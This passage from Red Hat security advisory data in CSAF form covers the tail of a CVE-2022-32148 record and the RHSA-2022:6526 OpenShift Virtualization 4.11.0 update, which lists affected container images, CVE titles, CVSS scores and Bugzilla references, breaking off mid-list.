"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-32148", }, { category: "external", summary: "RHBZ#2107383", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-32148", url: "https://www.cve.org/CVERecord?id=CVE-2022-32148", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-32148", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-32148", }, { category: "external", summary: "https://go.dev/issue/53423", url: "https://go.dev/issue/53423", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working", }, ], }
RHSA-2022:6526
Vulnerability from csaf_redhat
Published
2022-09-14 19:28
Modified
2025-05-02 16:09
Summary
Red Hat Security Advisory: OpenShift Virtualization 4.11.0 Images security and bug fix update
Notes
Topic
Red Hat OpenShift Virtualization release 4.11.0 is now available with updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.
This advisory contains the following OpenShift Virtualization 4.11.0 images:
RHEL-8-CNV-4.11
===============
hostpath-provisioner-container-v4.11.0-21
kubevirt-tekton-tasks-operator-container-v4.11.0-29
kubevirt-template-validator-container-v4.11.0-17
bridge-marker-container-v4.11.0-26
hostpath-csi-driver-container-v4.11.0-21
cluster-network-addons-operator-container-v4.11.0-26
ovs-cni-marker-container-v4.11.0-26
virtio-win-container-v4.11.0-16
ovs-cni-plugin-container-v4.11.0-26
kubemacpool-container-v4.11.0-26
hostpath-provisioner-operator-container-v4.11.0-24
cnv-containernetworking-plugins-container-v4.11.0-26
kubevirt-ssp-operator-container-v4.11.0-54
virt-cdi-uploadserver-container-v4.11.0-59
virt-cdi-cloner-container-v4.11.0-59
virt-cdi-operator-container-v4.11.0-59
virt-cdi-importer-container-v4.11.0-59
virt-cdi-uploadproxy-container-v4.11.0-59
virt-cdi-controller-container-v4.11.0-59
virt-cdi-apiserver-container-v4.11.0-59
kubevirt-tekton-tasks-modify-vm-template-container-v4.11.0-7
kubevirt-tekton-tasks-create-vm-from-template-container-v4.11.0-7
kubevirt-tekton-tasks-copy-template-container-v4.11.0-7
checkup-framework-container-v4.11.0-67
kubevirt-tekton-tasks-cleanup-vm-container-v4.11.0-7
kubevirt-tekton-tasks-disk-virt-sysprep-container-v4.11.0-7
kubevirt-tekton-tasks-wait-for-vmi-status-container-v4.11.0-7
kubevirt-tekton-tasks-disk-virt-customize-container-v4.11.0-7
vm-network-latency-checkup-container-v4.11.0-67
kubevirt-tekton-tasks-create-datavolume-container-v4.11.0-7
hyperconverged-cluster-webhook-container-v4.11.0-95
cnv-must-gather-container-v4.11.0-62
hyperconverged-cluster-operator-container-v4.11.0-95
kubevirt-console-plugin-container-v4.11.0-83
virt-controller-container-v4.11.0-105
virt-handler-container-v4.11.0-105
virt-operator-container-v4.11.0-105
virt-launcher-container-v4.11.0-105
virt-artifacts-server-container-v4.11.0-105
virt-api-container-v4.11.0-105
libguestfs-tools-container-v4.11.0-105
hco-bundle-registry-container-v4.11.0-587
Security Fix(es):
* golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)
* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)
* golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)
* golang: syscall: don't close fd 0 on ForkExec error (CVE-2021-44717)
* prometheus/client_golang: Denial of service using InstrumentHandlerCounter (CVE-2022-21698)
* golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString (CVE-2022-23772)
* golang: cmd/go: misinterpretation of branch names can lead to incorrect access control (CVE-2022-23773)
* golang: crypto/elliptic: IsOnCurve returns true for invalid field elements (CVE-2022-23806)
* golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675)
* golang: regexp: stack exhaustion via a deeply nested expression (CVE-2022-24921)
* golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)
* golang: crypto/elliptic: panic caused by oversized scalar (CVE-2022-28327)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Red Hat OpenShift Virtualization release 4.11.0 is now available with updates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.\n\nThis advisory contains the following OpenShift Virtualization 4.11.0 images:\n\nRHEL-8-CNV-4.11\n===============\nhostpath-provisioner-container-v4.11.0-21\nkubevirt-tekton-tasks-operator-container-v4.11.0-29\nkubevirt-template-validator-container-v4.11.0-17\nbridge-marker-container-v4.11.0-26\nhostpath-csi-driver-container-v4.11.0-21\ncluster-network-addons-operator-container-v4.11.0-26\novs-cni-marker-container-v4.11.0-26\nvirtio-win-container-v4.11.0-16\novs-cni-plugin-container-v4.11.0-26\nkubemacpool-container-v4.11.0-26\nhostpath-provisioner-operator-container-v4.11.0-24\ncnv-containernetworking-plugins-container-v4.11.0-26\nkubevirt-ssp-operator-container-v4.11.0-54\nvirt-cdi-uploadserver-container-v4.11.0-59\nvirt-cdi-cloner-container-v4.11.0-59\nvirt-cdi-operator-container-v4.11.0-59\nvirt-cdi-importer-container-v4.11.0-59\nvirt-cdi-uploadproxy-container-v4.11.0-59\nvirt-cdi-controller-container-v4.11.0-59\nvirt-cdi-apiserver-container-v4.11.0-59\nkubevirt-tekton-tasks-modify-vm-template-container-v4.11.0-7\nkubevirt-tekton-tasks-create-vm-from-template-container-v4.11.0-7\nkubevirt-tekton-tasks-copy-template-container-v4.11.0-7\ncheckup-framework-container-v4.11.0-67\nkubevirt-tekton-tasks-cleanup-vm-container-v4.11.0-7\nkubevirt-tekton-tasks-disk-virt-sysprep-container-v4.11.0-7\nkubevirt-tekton-tasks-wait-for-vmi-status-container-v4.11.0-7\nkubevirt-tekton-tasks-disk-virt-customize-container-v4.11.0-7\nvm-network-latency-checkup-container-v4.11.0-67\nkubevirt-tekton-tasks-create-datavolume-container-v4.11.0-7\nhyperconverged-cluster-webhook-container-v4.11.0-95\ncnv-must-gather-container-v4.11.0-62\nhyperconverged-cluster-operator-container-v4.11.0-95\nkubevirt-console-plugin-container-v4.11.0-83\nvirt-controller-container-v4.11.0-105\nvirt-handler-container-v4.11.0-105\nvirt-operator-container-v4.11.0-105\nvirt-launcher-container-v4.11.0-105\nvirt-artifacts-server-container-v4.11.0-105\nvirt-api-container-v4.11.0-105\nlibguestfs-tools-container-v4.11.0-105\nhco-bundle-registry-container-v4.11.0-587\n\nSecurity Fix(es):\n\n* golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)\n\n* golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)\n\n* golang: syscall: don't close fd 0 on ForkExec error (CVE-2021-44717)\n\n* prometheus/client_golang: Denial of service using InstrumentHandlerCounter (CVE-2022-21698)\n\n* golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString (CVE-2022-23772)\n\n* golang: cmd/go: misinterpretation of branch names can lead to incorrect access control (CVE-2022-23773)\n\n* golang: crypto/elliptic: IsOnCurve returns true for invalid field elements (CVE-2022-23806)\n\n* golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675)\n\n* golang: regexp: stack exhaustion via a deeply nested expression (CVE-2022-24921)\n\n* golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)\n\n* golang: crypto/elliptic: panic caused by oversized scalar (CVE-2022-28327)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2022:6526", url: "https://access.redhat.com/errata/RHSA-2022:6526", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "1937609", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1937609", }, { category: "external", summary: "1945593", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1945593", }, { category: "external", summary: "1968514", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1968514", }, { category: "external", summary: "1993109", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1993109", }, { category: "external", summary: "1994604", url: "https://bugzilla.redhat.com/show_bug.cgi?id=1994604", }, { category: "external", summary: "2001385", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2001385", }, { category: "external", summary: "2009793", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2009793", }, { category: "external", summary: "2010318", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2010318", }, { category: "external", summary: "2025276", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2025276", }, { category: "external", summary: "2025401", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2025401", }, { category: "external", summary: "2026357", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2026357", }, { category: "external", summary: "2029349", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2029349", }, { category: "external", summary: "2030801", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2030801", }, { category: "external", summary: "2030806", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2030806", }, { category: "external", summary: "2031857", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2031857", }, { category: "external", summary: "2033077", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2033077", }, { category: "external", summary: "2035344", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2035344", }, { category: "external", summary: "2036676", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2036676", }, { category: "external", summary: "2039976", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2039976", }, { category: "external", summary: "2040766", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2040766", }, { category: "external", summary: "2041467", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2041467", }, { category: "external", summary: "2042402", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2042402", }, { category: "external", summary: "2042809", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2042809", }, { category: "external", summary: "2045086", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2045086", }, { category: "external", summary: "2045880", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2045880", }, { category: "external", summary: "2047186", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2047186", }, { category: "external", summary: "2051899", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2051899", }, { category: "external", summary: "2052094", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2052094", }, { category: "external", summary: "2052466", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2052466", }, { category: "external", summary: "2052689", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2052689", }, { category: "external", summary: "2053429", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053429", }, { category: "external", summary: "2053532", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053532", }, { category: "external", summary: "2053541", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053541", }, { category: "external", summary: "2056467", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2056467", }, { category: "external", summary: "2057157", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2057157", }, { category: "external", summary: "2057310", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2057310", }, { category: "external", summary: "2058149", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2058149", }, { category: "external", summary: "2058925", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2058925", }, { category: "external", summary: "2059121", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2059121", }, { category: "external", summary: "2060485", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2060485", }, { category: "external", summary: "2060585", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2060585", }, { category: "external", summary: "2061208", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2061208", }, { category: "external", summary: "2061723", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2061723", }, { category: "external", summary: "2063540", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2063540", }, { category: "external", summary: "2063792", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2063792", }, { category: "external", summary: "2064034", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2064034", }, { category: "external", summary: "2064702", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2064702", }, { category: "external", summary: "2064857", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2064857", }, { category: "external", summary: "2064936", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2064936", }, { category: "external", summary: "2065014", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2065014", }, { category: "external", summary: "2065019", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2065019", }, { category: "external", summary: "2066768", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2066768", }, { category: "external", summary: "2067246", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2067246", }, { category: "external", summary: "2069287", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2069287", }, { category: "external", summary: "2069388", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2069388", }, { category: "external", summary: "2070366", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2070366", }, { category: "external", summary: "2070864", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2070864", }, { category: "external", summary: "2071488", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2071488", }, { category: "external", summary: "2071549", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2071549", }, { category: "external", summary: "2071611", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2071611", }, { category: "external", summary: "2071921", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2071921", }, { category: "external", summary: "2073669", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2073669", }, { category: "external", summary: "2073679", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2073679", }, { category: "external", summary: "2073982", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2073982", }, { category: "external", summary: "2074337", url: 